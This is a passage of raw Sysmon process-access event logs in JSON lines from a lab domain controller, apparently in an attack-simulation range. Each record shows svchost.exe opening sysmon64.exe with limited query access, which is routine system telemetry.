C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:54.602","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:54.602\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 